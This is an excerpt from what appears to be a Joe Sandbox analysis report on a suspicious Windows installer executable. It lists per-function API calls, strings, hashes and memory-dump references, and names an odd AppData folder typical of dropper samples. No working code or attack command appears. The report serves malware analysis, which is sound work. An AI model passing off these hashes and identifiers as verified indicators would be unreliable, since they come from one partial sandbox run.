API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\unshabbily$Tyfusepidemierne Setup: Completed
API String ID: 2624150263-2253691611
Opcode ID: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
Instruction ID: 5dd75e317128adb7bedb8be6abecdb1ea93c725c3d3faa56fa834c848e6f6950
Opcode Fuzzy Hash: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
Instruction Fuzzy Hash: 4BA19FF1900209ABDB11AFA5CC45BAFB7B8EF85314F10843BF611B62D1DB7C99418B69

Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC

Strings

C:\Users\user\AppData\Local\unshabbily\Toral, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\unshabbily\Toral
API String ID: 123533781-369527515
Opcode ID: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
Instruction ID: 27b6dc01e21a21dcf175964b2ce54e528eb66c3f275abda499c4f6713b6e0615
Opcode Fuzzy Hash: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
Instruction Fuzzy Hash: 355136B5A00208BFCF10DFE4C988A9DBBB5EF48314F2045AAF915EB2D1DA799941CF54

Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
Instruction ID: 8315facf8ced128c6c50566814b57074d619fda0e5ca52ae4c33e0c7423f4127
Opcode Fuzzy Hash: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
Instruction Fuzzy Hash: E8F0ECB2704111AFD710EB749D49AFE7778DB11324F20057BE645F20C1D6B88A45DB2A

Function 00404139 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C4
GetDlgItem.USER32(00000000,000003E8), ref: 004041D8
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F6
GetSysColor.USER32(?), ref: 00404207
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404216
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404225
lstrlenA.KERNEL32(?), ref: 00404228
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404237
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040424C
GetDlgItem.USER32(?,0000040A), ref: 004042AE
SendMessageA.USER32(00000000), ref: 004042B1
GetDlgItem.USER32(?,000003E8), ref: 004042DC
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040431C
LoadCursorA.USER32(00000000,00007F02), ref: 0040432B
SetCursor.USER32(00000000), ref: 00404334
LoadCursorA.USER32(00000000,00007F00), ref: 0040434A
SetCursor.USER32(00000000), ref: 0040434D
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404379
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040438D

Strings

: Completed, xrefs: 00404307
N, xrefs: 004042CA

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
Instruction ID: 7162b40555158b22622c6e9d00efc6f9eaf6d98589edfbec15a783eb0e256f30
Opcode Fuzzy Hash: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
Instruction Fuzzy Hash: 4E61A4B1A40205BFDB109F61CD45F6A7B69FB84704F00803AFB05BA2D1C7B8A951CF99

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405B9E Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D2F,?,?), ref: 00405BCF
GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405BD8

Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F

GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405BF5
wsprintfA.USER32 ref: 00405C13
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C4E
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C5D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C95
SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEB
GlobalFree.KERNEL32(00000000), ref: 00405CFC
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D03

Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\vq6jxdGvD6.exe,80000000,00000003), ref: 00405ACC
Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

Strings

[Rename], xrefs: 00405C7D, 00405C8F
%s=%s, xrefs: 00405C09

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
Instruction ID: 318577f01edad599db78de103440226658cd26d488467381f1a5ad924793321f
Opcode Fuzzy Hash: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
Instruction Fuzzy Hash: DC311331605B196BD2206B65AC49F6B3A6CDF45754F14053BFA01F72D2E63CAC018EBD

Function 00406199 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\vq6jxdGvD6.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
CharNextA.USER32(?,"C:\Users\user\Desktop\vq6jxdGvD6.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213

Strings

*?|<>/":, xrefs: 004061E1
C:\Users\user\AppData\Local\Temp\, xrefs: 0040619A
"C:\Users\user\Desktop\vq6jxdGvD6.exe", xrefs: 004061D5

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\vq6jxdGvD6.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3557776289
Opcode ID: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
Instruction ID: ca9b47fb282156c43c251839f6001ffd27a0cb8481c2ab4f175210ee2844123a
Opcode Fuzzy Hash: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
Instruction Fuzzy Hash: 0911046180839169FB3216244C44B7B7F898F5B760F1A44BFE8D6722C3C67C5C62866E

Function 00404057 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404074
GetSysColor.USER32(00000000), ref: 00404090
SetTextColor.GDI32(?,00000000), ref: 0040409C
SetBkMode.GDI32(?,?), ref: 004040A8
GetSysColor.USER32(?), ref: 004040BB
SetBkColor.GDI32(?,?), ref: 004040CB
DeleteObject.GDI32(?), ref: 004040E5
CreateBrushIndirect.GDI32(?), ref: 004040EF

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: becbdb48d67c78dbb8c9c091cdbe424430cb8bef044b76b3398d9101d9dbd489
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: 86215071904704ABCB219F68DD48B4BBBF8AF41714B048A29EA96B26E0C734E904CB65

Function 00404921 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040493C
GetMessagePos.USER32 ref: 00404944
ScreenToClient.USER32(?,?), ref: 0040495E
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404970
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404996

Strings

f, xrefs: 00404972

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 39a8229da7402e88b879503ea9069683dc6a956defdeaab739565ccd09fe5115
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: F3014071D00219BADB01DBA4DC85FFFBBBCAF55711F10412BBA11B61C0D7B869058BA5

Function 00402C61 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
MulDiv.KERNEL32(0007C77E,00000064,0007C782), ref: 00402CA7
wsprintfA.USER32 ref: 00402CB7
SetWindowTextA.USER32(?,?), ref: 00402CC7
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9

Strings

verifying installer: %d%%, xrefs: 00402CB1

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
Instruction ID: 60d807589532a1750165d7633efe1ba379d0dd74474c58c1bab17da8cefdfa8e
Opcode Fuzzy Hash: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
Instruction Fuzzy Hash: DA011271944209FBEF209F60DD09EEE37A9EB04304F008039FA06B92D0D7B99995CF59

Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
GlobalFree.KERNEL32(?), ref: 004027E5
GlobalFree.KERNEL32(00000000), ref: 004027F8
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 3fc906cc5814f1f80ca93e9dadef5c7fad5cafe1ef7802143d47ec90486de439
Instruction ID: 6a21e90f7c3239ff032d316014871365707a2127fc9d4c87d4a28567e6836d84
Opcode Fuzzy Hash: 3fc906cc5814f1f80ca93e9dadef5c7fad5cafe1ef7802143d47ec90486de439
Instruction Fuzzy Hash: 9B21C071C00124BBCF216FA5DD89DAE7B79EF05364F14423AF914762E0C6784D008FA8

Function 00404817 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Tyfusepidemierne Setup: Completed,Tyfusepidemierne Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
wsprintfA.USER32 ref: 004048BD
SetDlgItemTextA.USER32(?,Tyfusepidemierne Setup: Completed), ref: 004048D0

Strings

%u.%u%s%s, xrefs: 0040489F
Tyfusepidemierne Setup: Completed, xrefs: 004048A7, 004048AC, 004048B2, 004048C6

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Tyfusepidemierne Setup: Completed
API String ID: 3540041739-234225536
Opcode ID: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
Instruction ID: e2544e14f383b0e553931f5ad3d2c5e69aaccc6a02b7144a1c376111f1efcf8d
Opcode Fuzzy Hash: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
Instruction Fuzzy Hash: 2B11E473A041283BDB0076699C42EAF3288DB81374F254637FB65F21D1E979DC1286A8

Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
Instruction ID: 962fd9b87f23d05f09829d6e62e81eb88b122f60c97e2af10dcf53a19e6500d2
Opcode Fuzzy Hash: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
Instruction Fuzzy Hash: B0015272948340AFE7006BB0AE49F997FF4A715305F108479F241B62E2C67954569F3E

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
